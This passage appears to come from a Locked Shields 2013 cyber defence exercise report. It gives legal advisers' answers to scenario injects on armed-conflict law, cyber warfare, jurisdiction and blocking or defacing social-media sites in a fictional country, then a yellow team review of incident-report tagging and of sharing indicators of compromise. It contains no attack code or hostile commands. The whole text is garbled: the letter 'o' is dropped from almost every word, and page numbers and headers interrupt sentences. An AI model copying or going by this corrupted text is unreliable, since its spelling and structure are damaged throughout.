(and NATO) are invlved, the cnflict is defined by the lack f a state-state cnfrntatin. Fr the sake f the argument, it is assessed that the threshld f a nn-internatinal armed cnflict is indeed crssed. Fr references: see /eng/assets/files/ther/pinin-paper-armed-cnflict.pdf What is cyber warfare, after all? Hw d yu as a lawyer understand it? Is what's happening in Blea cyber warfare? Cyber warfare culd be used t refer t a number f phenmena. First f all, in a strict reading, cyber warfare is defined by the Dutch Advisry Cuncil n Internatinal Affairs as the cnduct f military peratins t disrupt, mislead, mdify r destry an ppnent s cmputer systems r netwrks by means f cyber capabilities. See: AIV & CAVV

109 11 f 16 (2011): Advisry Cuncil n Internatinal Affairs (AIV) & Advisry Cmmittee n Issues f Public Internatinal Law (CAVV), Cyber Warfare (reprt n. 77/22, 2011), see < The Dutch gvernment has cnfirmed that definitin in Parliament. It is clear that this strict reading shuld be placed in the cntext f military peratins in general, and in the cntext f armed cnflict in particular. Secndly, cyber warfare is als used, mst ften by the general public and the media, as an verarching cncept referring t threats and cunter-measures in cyber space. The wide interpretatin may be misleading, as it suggests that cyber espinage and cyber crime wuld be an element f cyber warfare. Which it isn t. Cyber activities f this kind hwever, may be part f an existing armed cnflict. As it is the case in Blea. Several cyber activities can be bserved right nw. They range frm defacement t activities that hamper availability t sme extent. As this disrupt ur cmputer systems t sme degree, sme f the cyber incidents prvided they are related the ne f the ppsing parties in the armed cnflict may indeed be qualified as cyber warfare prper D yu think we need new rules, a new treaty fr cyber warfare? With cyber crime, this is exactly what happened a special treaty was signed. There as multiple pinins in this respect. Fr sme, this is indeed the case. Other, like the authrs t the Tallinn Manual, take the stance, that existing the existing LOAC is flexible and adaptive, and, althugh interpretatin and clarificatin is needed, the ld LOAC may embrace cyber warfare rather well. See in this respect als: P. Ducheine, J. Vetelink, J. Stinissen & T. Gill, Twards a Legal Framewrk fr Military Cyber Operatins, in: P. Ducheine, F. Osinga and J. Seters (eds.), Cyber Warfare: Critical Perspectives NL ARMS 2012, The Hague: TMC Asser Press (2012), pp I have a cpy f the Blean penal cde here, and by lking at its prvisins n cyber, it seems that any cyber activity is illegal. Althugh n questin was psed, the answer wuld be as fllws. That may be the case. Hwever, human behaviur and activities that are illegal in times f peace (murder, etc), may be authrized in times f armed cnflict (killing enemies). If the cyber activities are permitted under the LOAC and the Rules f Engagement, they are lawfull under that bdy f internatinal law Des this mean that shuld the Calitin be cmmanded t cnduct cyber attacks, yu will face the threat f prsecutin by Blean authrities? In general the calitin shuld respect the lcal Blean laws and regulatins. Prir t deplyment, it is mst likely that a status f frces agreement (SOFA) has explicitly pinted ut the issue f jurisdictin and immunities. In general, Trp Cntributing Natins retain exclusive jurisdictin ver their trps. Therefre, prsecutin fr criminal behaviur nrmally will be in the hands f the TCN. Once the trps find themselves in an armed cnflict, the jurisdictin will be the exclusive prergative f the TCN. See: J.E.D. Vetelink, Status f Frces : Strafrechtsmacht ver militairen vanuit internatinaalrechtelijk & militair-peratineel perspectief, Diss. University f Amsterdam, The questin suggests that criminal rules have been vilated, which is nt the case up till nw (based n the current reprts). I wuld appreciate if yu culd get back t me tday because my stry will be published already tmrrw. Thank yu in advance! Jerry Hbbs

110 12 f Respnse frm Blue Team 8 Dear Mr. Hbbs, Please find belw the cmments t yur questins frm?blueteam I read frm a reprt that this is a nn-internatinal armed cnflict. Hw can this be the case when 9 natins and NATO are present in Blea with military frces? Fr an armed cnflict t be internatinal tw elements are required: a. b. the cnflict has t be armed and internatinal element. This generally means a cnflict between tw r mre states. In the current case the parties t the cnflict are the state f Blea n the ne hand and the ppsitin armed grup BIT n the ther hand. The calitin acting under UNSC mandate is acting in supprt f the Blean gvernment. This des nt render the cnflict internatinal since the calitin is nt fighting against anther state. The activities f BIT are nt attributable t any state. Therefre legally it is a nn-internatinal armed cnflict. The imprtant questin here is: why des it matter? Unlike in internatinal armed cnflicts the whle bdy f law f armed cnflict/internatinal humanitarian law is nt applicable in nn-internatinal armed cnflicts. One f the main significances is that the ppsitin armed grup des nt have a legitimate belligerent status and members f thse grups are nt cmbatants. Under Blean internal law this grup is mst likely a criminal grup What is cyber warfare, after all? Hw d yu as a lawyer understand it? Is what's happening in Blea cyber warfare? In general any hstile use f cyber space that amunts t use f frce and armed cnflict can be cnsidered cyber warfare. Legally the emphasis is nt n cyber as such but n the fact f use f frce (in the sense f ius ad bellum) r existence f armed cnflict. Cyber means are just anther means f cnducting these hstile activities and internatinal law n use f frce and n armed cnflict are applicable t thse activities. As the situatin in Blea is qualified as a nn-internatinal armed cnflict then we can say that the activities carried ut in cyber space by the parties t the cnflict must als respect the nrms f LOAC that are applicable t nn-internatinal armed cnflict D yu think we need new rules, a new treaty fr cyber warfare? With cyber crime, this is exactly what happened a special treaty was signed. As I explained abve cyber warfare is nt happening in a legal vacuum internatinal law nrms n use f frce and n armed cnflict are applicable and these nrms must be applied in cyber cnflicts. In certain cases the specific applicatin f certain nrms might need further clarificatin due t specificities f cyber space. State practice will in the years t cme clarify many issues that might seem vague tday. A gd example f trying t clarify hw the nrms f internatinal law apply in cyber space is the Tallinn Manual (see In this initiative a grup f independent experts f internatinal law have analysed hw existing internatinal law nrms apply in cyber space. A new cnventin wuld have t be an initiative f a grup f likeminded cuntries but at the mment there des nt seem t be a will in the internatinal cmmunity fr such a cnventin. The situatin with the cnventin n cyber crime is different since crimes are generally a matter f internal law f cuntries and law enfrcement. The Budapest cnventin des nt regulate cyber crime as such but the gal f the cnventin is t enhance c-peratin between cuntries in fighting cyber crime I have a cpy f the Blean penal cde here, and by lking at its prvisins n cyber, it seems that any cyber activity is illegal. Des this mean that shuld the Calitin be cmmanded t cnduct cyber attacks, yu will face the threat f prsecutin by Blean authrities?

111 13 f 16 The calitin is acting under the UNSC mandate and the rules f engagement with the gal f prtecting civilians in Blea. The gvernment f Blea has authrised the calitin s activities. Therefre members f the armed frces f the calitin cannt be prsecuted under Blean internal law and are subject t the sending natins jurisdictin. With kind regards, BT8 LEGAD 3.4. Respnse frm Blue Team 9 Dear Jerry, Thank yu fr yur questins! These natins yu mentined are participating in the cnflict by assisting Blean gvernment. Fr this reasn the nature f the cnflict is nt internatinal armed cnflict. (There is n existing cnflict between at least 2 different natins). Cyber warfare is nt actually s different cnventinal warfare. Mst cmmn definitin fr cyber warfare is that it is: the use f cmputers and ther devices t attack enemy s infrmatin systems as ppsed t fr example enemy s armies r factries. As a lawyer I wuld basically understand it as peratins taking place in cyberspace. It can be discussed and debated if this what is happening in Blea, amunts t cyber warfare. Hwever, it can be said that ppsing frces have attempted t cause serius harm n humanitarian aid peratin in Blea thrugh illegal cyber activities. On my pinin, we d nt need any new rules r treaties fr cyber warfare. Instead, we shuld encurage internatinal discussin and examinatin n means and methds f cyber warfare. The recent special treaty n cyber crimes was n my pinin necessary, because cyber crimes are ften highly multinatinal and efficient c-peratin between natins is needed in rder t cunter them. The prvisins f Blean penal cde d nt n my pinin frbid Blean authrities (and als internatinal calitin peratin assisting Blean gvernment) frm defending themselves against illegal cyber activities, which is the case in current situatin. Naturally we respect Blean laws. Best regards, LEGAD Blue Team 9 4. Inject 1, Day Inject Descriptin Legal advisrs, Since the cyber attacks n the calitin frces are grwing ut f cntrl, we need anther brief tmrrw mrning at 07:00Z. It will have t be quick, n mre than 15 minutes, because peple need t be at the cmputers trying t get a hld f the situatin. Address the fllwing questins and anything else yu find critical: G thrugh the media reprts f tday and analyse whether yu need t give pinters t the technical experts when cmmunicating with the media. Des the increase in attacks braden the range f ptins fr legitimate respnses? There is press infrmatin suggesting war crimes are being cmmitted by BIT. Advise the cmmander f his respnsibilities fr lgging data? Everything else remains the same I will again need a mem f the brief what yu said and hw the brief went. Nicle Underwd Head Legal Advisr Jint Cmmand 4.2. Respnse frm Blue Team 10 Dear Mrs Underwd,

112 14 f 16 tdays legal briefing was shrt again. Regarding the cmmunicatin with the media, we discussed the questin, hw (far) we cmmunicate ur view n the attributin f certain attacks. As a result f this discussin we will stay with ur cautius (terse legalese) style. Here is the summarizatin f what i said: Legal Briefing Lcked Shields nd Day 1 media 1.1 fact: sme negative reprts (e.g. payment f the Supprt teams, dubts regarding neutrality f the aid-rgs because f calitin IT-supprt) 1.2 check if ur answers may have negative effects 1.3 emphasize that: we are here t help the aid rgs and the blean peple the calitin des nt try t gain influence in the aid rgs the calitin wuldn't use aid rg equipment fr the calitins wn aims 2 increased attacks 2.1 media reprts indicate, that this cnflict still may be cnsidered a nn-internatinal ne 2.2 if that wuld be the case, we culd act in self-defense against the cyber attacks 2.3 regarding the principle f prprtinality, ur range f defense cyber means wuld increase with the range f attack means 2.4 BUT: We cntinue t perfrm defensive peratins ONLY. Attributin Prblem is still unslvable. 3 war crimes by BIT 3.1 lgging/dcumentatin f what we d, t prevent false accusatins that ur team members r the caltin frces cmmitted (cyber)warcrimes 3.2 We shuld lg the attackers peratins as well, as lng as it desn't interferes with ur defensive peratins. S we can prevent reprts, that the calitin hinders the prsecutin f warcrimes. **** Best Regards BT10-Legal 5. Inject 2, Day Inject Descriptin Legads, The HQ has brught up an additinal issue. Please have a lk at it and get back t me by 10:00Z. Cnsidering that the attackers are creating sme buzz n scial media, and ptentially will be crdinating attacks against us there, please advise what measures we can take, shuld the need arise, in rder t shut dwn access t thse sites? Can we blck access t thse websites r take them dwn? Or, alternatively, culd we deface thse sites? MGen Alex Ander 5.2. Respnse frm Blue Team 8 Dear MGen Ander, Here are the LEGAD cmments t yur questin: As a first step yu culd ask the wner f the scial media website t filter the psts r if the wner is reluctant t c-perate then the same culd be asked frm the ISP. If the site wner r ISP d nt respnd r refuse then a request culd be made under the internal law f the scial media website cuntry (law enfrcement issue). Taking the issue t LOAC level wuld be very risky and sensitive.

113 15 f 16 First wuld it be permissible under the SC mandate (threat f attack against civilians)? That wuld prbably require very wide interpretatin f the mandate. Secnd, wuld it be permissible under the ROE (defensive actin nly)? Third, yu wuld have t prve that the website is a cmmunicatin channel f the adversaries and is used t gain military advantage (military bjective) it wuld be very difficult t prve it (again, requires very wide interpretatin). Als, it wuld nt lk gd in a demcratic sciety. In additin any interference in private media wuld bring abut claims against the calitin since they are private cmpanies and wuld lse revenues. Mst f the site cntents have nthing t d with the cnflict. In cnclusin it is feasible but it is a matter f cnditins and cnsequences. POLAD advice wuld be needed, taking int accunt all the legal questins referred abve. BT8 LEGAD 5.3. Respnse frm Blue Team 10 Dear MG Ander, I strngly recmmend, NOT t take any f the measures yu mentined! Blcking/Shuting dwn At first, the blcking (r shuting dwn) f scial media wuld interfere with the right f free speech, that prbably all f the calitins natins see as fundamental right. The blckade wuld nt nly affect the attackers, but als nrmal users. Besides this, recent develpements in the arabian wrld have shwn, that the cmmunicatins can't be blcked in ttal. S the attackers wuld prbably find a way t crdinate their attacks. Therefre the nly victim f the blckade wuld be the peaceful ppulatin. Regarding this, i dn't see a reasnable prprtinality between the psitive effects fr ur cyberdefense (sme bstacles in crdinatin f the attacks) and the negative effects n the right f freedm f speech. Defacements I am nt sure, what psitive effects yu expect frm a defacement. I just can imagine, that yu want t alter the messages t place false infrmatin. S the crdinatin effrts may be disrupted. But therefre hacking the servers prbably wuld be necessary. This measure culd bring us t legal prblems nt just within blea but als in the natins where the different scial media firms are lcated. Hacking int servers and altering data - n systems nt wned by the cnflict parties - wuld prbably be cnsidered as criminal act in all f thse natins. Other than the NYT Stry tld the wrld, BT10-Legal always stated clearly, that the main preventin frm prsecutin is the fact, that the supprt teams dn't hack ther systems. The UN-Mandate is n excuse fr criminal acts all arund the wrld. Other pssible measures There are tw measures that i wuld cnsider as lawful. We can try t use the scial media cmmunicatin f the attackers fr intelligence purpse. S we can prepare fr the attacks. But its likely, that they will be able t hide their cmmunicatins frm us - just because f the verwhelming mass f scial media messages. Secnd, we culd try t cntact thse scial media firms, that we think, the attackers will rely n. Mst f the scial media plattfrms frbid the use fr criminal purpse. S we culd warn them that there culd be a massive abuse f their platfrms fr the crdinatin f attacks n aid rgs. Perhaps the firms will try t help and filter thse messages r newsgrups n their wn. This wuld nly affect the attackers cmmunicatin and nt all f the users. Besides n hacking is needed, because the wner f the system himself is ding it. Best regards BT10-Legal 6. Inject 4, Day 2

114 16 f Inject Descriptin Legads, The press is ut f cntrl and reprting n us planning t g cyber ffensive. Where is this cming frm?? Find ut asap what the reference t cmmand and cntrl infrastructure means and what led the press t make such cnclusins, and send this infrmatin t me. Als, we will need t prvide a cunter-statement via the press t the general public t make sure this des nt result in chas. Please draft a reply addressing the false claims abut cyber ffense, and als tell them what the law really says, especially abut targeting civilians, and send it t me. Needless t say, we need t act fast! I will need the respnse frm yu by 11:15Z. MGen Alex Ander 6.2. Respnse frm Blue Team 5 Sir, We have n infrmatin where these infrmatin are cming frm and believe this culd be part f a prpaganda campaign rganized by BIT. We are nt deplying any means t start ffensive actins against BIT and cntinue acting in full accrdance with the?res and UN SC mandate. Belw is a draft press release. The Calitin strngly denies the infrmatin published by Lcked Shield News that it will target BIT cyber hacktivist thrugh lethal means. The Calitin has been taking defensive actins against cyber attachs launched by BIT and BIT sympathizers in full accrdance with the laws f armed cnflict. These actins are taken t ensure that the aid peratins can cntinue unimpended. It shuld be nted that under armed cnflict law, civilians cannt be targeted. Hwever, civilians participating t hstilies lse this immunity and can be targeted as lng as they participate t hstilities. This culd allw the use f cyber and kynetic means. It is hwever the Calitin plicy t use the least amunt f frce necessary t stp these attacks. The Calitin expects that we can cntinue acting thrugh cyber means nly and are cperating with law enfrcement agency in Blea t arrest the persns taking part in these attacks. The Calitin is perating under a clear mandate frm the UN Security Cuncil t assist the civilian ppulatin f Blea. This mandate has nt changed. The NATO mandate is als limited t defensive actins nly. 4. In terms f the persnal data, we have infrmed the Blean data prtectin authrity f the leak. We have started investigating the extent f the release f data and carried ut an assessment f the risks caused by the breach. Mrever, we have infrmed the persns cncerned and taken them t safety t ensure that they are nt targeted by BIT sympatizers. BT5 LEGAD

115 1 f 8 Cntents 1. Executive Summary 2. Abut the Technlgy 3. Reprting Vlume and Types 4. Reprting Quality 5. Recmmendatins 6. Feedback t the Blue Teams 1. Executive Summary Yellw team's fcus was t prvide situatin awareness ver the game events. The team facilitated in-game and ut-f-game data cllectin, prcessing and visualizatin. In-game data cllectin cnsisted f facilitating expert infrmatin sharing between blue team and yellw/white team. Out-f-game cllectin fcused n facilitating the varius scring requirements, frm autmatic scring t manual scring. This year, we received 1242 incident reprts, which is a significant increase t the year In 2012 we received 376 reprts (average f 42 per team). Increase in vlume intrduced slight decrease in average value f each reprt. Hwever, as a whle we had better insight t the game events, as well as t the maturity f different teams. Furthermre, having real data is an excellent starting pint fr imprving the cllabratin between blue teams (critical infrastructure defenders) and yellw team (headquarters). This reprt fcuses n bservatins that can be used next year t enhance the quality f reprts, as well as assigning pririties t new capabilities which have been planned fr future, namely: IC sharing service - Blue teams vluntarily shared and used intelligence abut malicius identities in their incident reprts. Identities were mstly IP addresses. This kind f sharing is fairly easy t streamline. Als headquarters can autmatically prvide further intelligence abut the identities, which in turn prvides in-game incentive fr blue team sharing. Actin jurnal - while practive actins is valuable infrmatin that culd be shared, it shuld be treated as a separate wrkflw f incident reprting. If blue teams like t reprt practive actins anyway, a simpler prcess culd be intrduced t increase the verall thrughput f infrmatin sharing. 2. Abut the Technlgy Exercise used AbuseSA prduct with CDX extensin t facilitate cllabratin, infrmatin sharing and situatin awareness. It cmbines different tls and wrkflws seamlessly and it adapts t changing requirements in rder t imprve the prcess iteratively as new knwledge and gals require. AbuseSA base prduct is designed fr cllecting, aggregating, nrmalizing and visualizing infrmatin frm varius surces, t prvide actinable reprts and situatin awareness visualizatins. The CDX extensin is a mdule that enables dmain experts t cntribute insight int the situatin awareness.

116 2 f 8 Picture: CDX extensin implements light-weight human reprting wrkflw, designed t serve users ranging frm lcal experts t decisin makers (pictures frm anther exercise). Picture: In 2012 CDX extensin implemented light-weight reprting. In 2013 it brught in wrkflws t prvide feedback t the blue teams, as well as t the decisin makers. Picture: All teams prvide a vide range f different types f reprts. 3. Reprting Vlume and Types The reprting vlume tripled this year. There are prbably tw reasns fr the increase. 1) We had stripped frmality frm the reprts, s reprting required less cgnitive verhead, and 2) several f the teams, perhaps as a result f lw-verhead reprting, treated every bservatin as an incident. Fr example ne IDS event wuld cnstitute an incident. Similar thing was bserved in reprts f practive actins. Sme teams reprted

117 3 f 8 every fix as a separate incident, even thugh similar actins were perfrmed t different machines. Hwever, the fact that teams are reprting, even in t detailed level, is a much better situatin cmpared t previus years, where any insight was hard t get. Even the data which culd be cnsidered useless at the first glance, tells a stry with a deeper lk. Fr example, if a team mstly reprts IDS bservatins, it prvides a hypthesis: is this team perating mstly n reactive level? Als the fact that a lt f practive measures were reprted, culd tell us that next exercise culd fcus n mre advanced tpics, while basic due diligence actins, such as patching and vulnerability scanning culd be cnsidered business-as-usual Abut the Tagging By cmbining the benefits which cme frm the fcusing n situatin awareness (instead f lng-term histrical trends) and centralized tagging, we enjy the fllwing benefits: Spending time t create bullet-prf hierarchical taxnmy t cver the types f bservatins is nt necessary. Training reprters t this taxnmy is nt necessary either. Hierarchical taxnmies suffer the fllwing issues: Creating a wrking hierarchical taxnmy is clse t impssible. Even mre s in the cyber-wrld, where there is n lng histry n classifying different events. It is hard fr the humans t pick ne categry, if nly ne is allwed. Fr example, if the taxnmy wuld cnsists f explit and defacement - what shuld the reprter use in the case the defacement was dne by expliting a web r database server? After the taxnmy is implemented, it is hard t mdify as the previusly cllected data will need revisiting We can adjust ur plans during the game. Fr example, if we want t start bserving wether the teams understand that DOS attacks were cnducted trugh BGP-pisning, instead f flding traffic, we can start tagging BGP-bservatins accrdingly. Overall, we can adjust the level f detail f situatin awareness, by utilizing mre high-level tags r mre detailed tags. Especially when the ntlgy is cntrlled by the persn respnsible f analyzing and reprting the bservatins, this freedm prvides a pwerful tl t the analyst. We can use several tags, if we want t highlight several aspects f ne reprt. Belw, we explain the tags used in the exercise. Practive - any kind f practive measure t prevent future cmprmises. Patching, fixing f web applicatin vulnerabilities, cde review etc. Attempt - an failed attempt f malicius activity. Failed SQL injectin, failed explit, blcked attack etc. Suspicius - a suspicin f malicius activity. Typically IDS alerts. Cmprmise - a successful cmprmise f the system. Planted malware, planted user accunts, backdrs etc. Insufficient Infrmatin - the analyst culd nt deduce which tags he r she shuld use Recn - recnnaissance activity frm the perpetratr. Mstly prt f vulnerability scanning. DS - denial f service. DDS flding, rendering a service useless by cnfiguratin change, crashing a service with malicius requests r respnses. BGP-Pisning - a special case f DS the yellw team started mnitring fr, after red team started t cnduct bgp-pisning attacks False - cnfirmed false alarms Plicy Vilatin - incidents that are nt necessarily a result f malicius activity, but prbably reprted due t the fact that they cntradict with the plicies f any given rganizatin. P2P traffic, undcumented hsts in the netwrk etc. Duplicate - reprts that were accidentally duplicated by the blue teams. Fr example if new ticket was accidentally created when prviding additinal infrmatin. Irrelevant - reprts that are fully irrelevant in the cntext f incident reprting. Greetings, giving feedback f the reprting system etc. Irrelevant-tag des nt mean that there is n value at all in these kinds f reprts. Fr example bsting the mrale r using a cnvenient channel fr giving feedback is still usable in cntexts ther than incident reprting. Legal - teams cnsidering legal implicatins r asking fr legal advice Phishing - phishing reprts. Fr example a user has received an requesting usernames and passwrds. Physical - in-game physical event, such as explsin in the server rm The reader shuld cnsider wn tagging based n the lessns-learned f this dcument, when creating wn

118 4 f 8 tagging ntlgy Distributin When blue teams shared their bservatins, yellw team assigned tags fr the events. Yellw team tagging tk frm secnds per reprt, depending n the quality f the reprt. In mst cases, 30 secnds was enugh. During the first day, attempting t handle all the reprts generated sme backlg fr the YT analyst, wh als cnducted ther tasks, such as giving situatin briefings, searching fr infrmatin fr White and Red teams etc, as well as intrducing the system t VIP visitrs. On the secnd day, we changed apprach. We nly handled reprts, where the state was pen at any given mment. We assumed that if the case is clsed (quickly), the expected value f the reprt drps, while pen cases deserve mre attentin. After the exercise, we tagged all the remaining (clsed) reprts. Picture: On secnd day we intrduced a wrkflw, where we had a task list cnsisting untagged pen reprts. Picture: Distributin f reprt tags assigned by the yellw team. In the future exercises, we expect t see drp in the number f types presented in different shades f gray Pririties Nw that we have plenty f reprts at ur dispsal, we had a lk hw clearer fcus wuld affect t the reprting vlumes. We assigned pririties t different types f reprts, as fllws: First pririty: incident has happened r there is a gd cnfidence that a break-in was attempted Secnd pririty: bservatins f recnnaissance activity, r reprts that d nt cntain enugh infrmatin t deduce wether incident has happened Third pririty: infrmatin that was prvided utside the scpe f riginal intent. tag # f reprts pririty

119 5 f 8 practive 350 third attempt 258 first cmprmise 151 first suspicius 178 secnd insufficient infrmatin 99 secnd recn 69 secnd technical issue 47 third defacement 32 first ds 20 first bgp-pisning 17 first false 13 third plicy vilatin 6 first duplicate 5 first irrelevant 5 third unclassified 5 first legal 3 first physical 1 first phishing 1 first Table: Pririties were assigned as shwn. Picture: With tighter fcus, the number f incident reprts culd be cut dwn t belw half. 4. Reprting Quality In this sectin we exemplify what can be deduced frm the reprts. The best takeaway frm this sectin is t understand what wuld be pssible, if reprting wuld be implemented in mre cntrlled envirnment, such as in rganizatin r inside a natin, where critical actrs wuld underg half-day training n reprting. The current data set is based n reprts prvided by individuals with little r n training, s we expect a certain amunt f bias in the reprts.

120 6 f Practive Actins (A) A number f teams reprted a large number f practive actins. Especially blue2, blue3, blue5, and blue6 were reprting massess f practive actins. While practive actins d nt belng t the dmain f incident reprting, it was used, prbably due t cnvenience. White team asked blue teams t reprt als practive actins, and lw-verhead reprting prvided an easy way f ding that. Quite ften, teams did nt aggregate the actins, e.g. same actin n several different machines were reprted as separate actins. We can deduce tw things frm ur bservatins: Given that the teams went the truble f prviding infrmatin even frm single actins, the reprting was sufficiently easy. There is rm fr intrducing a bit mre granularity t the reprting. Given the lack f aggregatin, a number f teams seam t thing mstly n peratinal level. Tactics and strategies might be verlked. Sme uncertainty can be assigned t this cnclusin, as sme f the teams might have thught that a higher number f reprts crrelate with better scre Suspicius (B) Reprts tagged with suspicius cnsisted mstly f reprts that we knw r suspect t be a result f IDS alert. IDS alerts histrically have a lt f false psitives, s we didn't g further in ur speculatin. Als in these reprts, the lack f aggregatin was visible. The high number f blue1 reprts with suspicius-tag implies that blue1 reprted each IDS alert, as separate reprts. Their slutin frm the natinal defense perspective was subptimal, as expert infrmatin sharing was designed t avid exactly the prblem f analysts having a number f machine reprts at their hand, lacking all the insight that lcal experts culd prvide. Furthermre, this kind f activity belngs t autmatin. There wuld have been mdule t cllect Snrt alerts autmatically, shuld we have chsen t utilize it Attempt (C) Attempts were reprted by several teams and smetimes in vlumes. Especially Blue3, Blue4 an Blue5 prvided a lt f data frm attempted attacks. Sme crrelatin between practive measures and attempts (un-successful attacks) is visible, fr example in blue3, and blue5 reprts. Hwever, als cntradicting material is visible, fr example in blue6 reprts (74 practive measures vs 5 attempts and 11 cmprmises) Insufficient Infrmatin (D) Quite ften, the reprts were tagged with "insufficient infrmatin" due t the fact that the team did nt state explicitly r implicitly the impact f the attack. Fr example, they reprted IDS bservatins and actins (such

121 7 f 8 as blacklisting), but n insight n the fact whether the attack was successful r nt. The analysts were able t deduce the impact quite ften frm weak signals, such as the team stating that "malware was remved". In these cases we tagged the reprt apprpriately (cmprmise), while anther apprach wuld have been t teach the team t prvide mre detail. Prviding seemingly trivial details wuld be beneficial frm the standpint that it takes few secnds fr the team t mentin the impact, while it culd take several minutes frm the analysts t make the decisin based n anecdtal infrmatin Defacements (E) It was delightful t see that the ratin between cmprmise-reprts and defacement-reprts had turned mre heavily t discvering cmprmises. Defenders see mre easily defacements, s we expect bias twards defacement-reprts. Defacements can be a frm f diversin frm Red Team side. In 2012 exercise we fr example saw that if red team was cnducting tw attacks at the same time, namely defacements and stealing f SCADA passwrds, nly the defacements gt reprted. The lack f defacement reprts can be als explained by the fact that Red Team de-emphasized defacement attacks this year. 5. Recmmendatins Based n ur bservatins, we list belw recmmendatins that wuld take the infrmatin sharing and situatin awareness t the next level in future exercises IC sharing Service IC refers t Indicatrs f Cmprmise. Traditinally, these have been used t share indicatrs, such as malicius IP addresses, C&C dmain names, hashes f malware etc. Intrducing the IC cncept t the game wuld direct the players t think what kind f infrmatin is useful t share. It wuld bring fcus t the reprts. We dn't prpse implementing the OpenIC XML-frmat t the game due t added cmplexity. Hwever, we prpse that we take the idea and prvide a simple way t share indicatrs f cmprmise. This infrmatin can be utilized in many ways: YT/White team can autmatically prvide intelligence based n the?ics shared by the blue teams. This will create an in-game incentive fr the reprters, as well as simulates better the real-wrld scenari, where it is clse-t impssible t find the perpetratr withut internatinal cllabratin, which is quite ften based n sharing this kind f infrmatin. Malicius identities can be mnitred autmatically, if deemed necessary. Sme teams, if they deem necessary, can tap int the IC sharing service, and either autmate, r semi-autmate, the blacklisting f selected identities. (Cnfirmed C&C servers and s frth). Of curse, teams shuld be free t fully autmate blacklisting f all identites, and suffer the cnsequences trugh drpped service level (learn by ding) Mre Fcus n the Cntext f Reprting when Intrducing Reprting Instructins When different game aspects are intrduced in live meetings befre, and during the game, the cntext f reprting shuld be explained t the blue teams. Fr example: The cntext is t share infrmatin that natinal actr can share t ther defenders, in rder t strengthen the defense. IC:s are valuable as their utilizatin can be autmated and defenses get mre clse t real-time Single actins are nt interesting in the cntext f cllabrative defense, as this high-vlume detailed infrmatin is harder t share and put int use implement in ther teams. * Hwever, clever tips and tricks shuld be shared, with a wrkflw which cntains fewer steps. There culd be a simple prtal fr sharing tips and tricks, which wuld be accessible by all blue teams. The gal is t build insight. S it wuld be better t aggregate bservatins t fewer separate incidents, in rder t build-up an incident histry Critical Infra Prtectin Sensr Service Several cuntries are already running a natinal critical infrastructure mnitring service. Similar service culd be intrduced, as a cmplementary service, t the game in a fairly autmated manner. Fr example sensrs culd bserve malicius identities shared by blue teams, and create alerts based n sensrs run fr each blue team (critical infrastructure prvider). Yellw team wuld have verall situatin awareness f what kind f actinable alerts are seen in different teams. Blue teams culd benefit frm a centralized service prvided by a

122 8 f 8 small team f security prfessinals. This wuld nt remve the need fr teams t run their wn detectin capabilities, as the sensr netwrk wuld fcus n threats against the whle critical infrastructure, as ppsite f trying t catch each and every incident that culd happen inside the blue team. 6. Feedback t the Blue Teams Initially, we cnsidered giving individual feedback. Hwever, as the feedback was mstly t same fr everyne, we will give feedback fr all belw. Furthermre, we have cnsidered hw t enhance the reprting s that this kind f feedback wuld nt be necessary in the fllwing years Successful Cllabratin All the teams reprted diligently their actins and bservatins. Based n the results f LS13, we can safely say that infrmatin sharing is at least technically pssible, and peple are willing t share, given that they d nt need t cnsider the ptential negative aspects f sharing, such as legal and plitical implicatins. We hpe that the exercise has demnstrated trugh practice, that there is a lt f infrmatin that can be shared withut legal issues. We als bserved cllabrative initiatives that ccurred even withut an specific incentive in the exercise. We saw blacklisting services, malware analysis and sharing f tips and tricks t prtect thers. We wuld like t thank the teams wh shwed practical examples n hw teams can cllabrate just because it is the right thing t d Incident Histry A lt f the teams treated the reprting as an single-sht channel t reprt actins, where as the headquarters expected incidents where the knwledge wuld build up ver time by itself. (E.g. the yellw team des nt have t aggregate themselves the different reprts t gain verall understanding. In practice, building understanding wuld happen by using selected hash-tags fr certain phenmena's, and reusing thse hashtags when additinal infrmatin ccurs. Getting the birds-eye view right frm the start is nt simple, s we understand that getting rid f splits and merges f incidents can nt be ttally avided. Hwever, we wuld have expected sme increase in the reprts where different bservatins accumulate t single reprts Human Insight vs Alerts frm Autmatin This is related t the remarks made at sectin Incident Histry. The reasn expert infrmatin sharing was implemented, was t avid the pitfalls f nn-lcal expert analyzing technical infrmatin withut the access t the data that the lcal experts have (netwrk captures, lgs etc). Thus prviding incident reprts fr example frm each IDS alerts was a bit cunterprductive. This kind f reprts increase the wrklad f YT/Headquarters, and that is time away frm analyzing the cnfirmed incidents.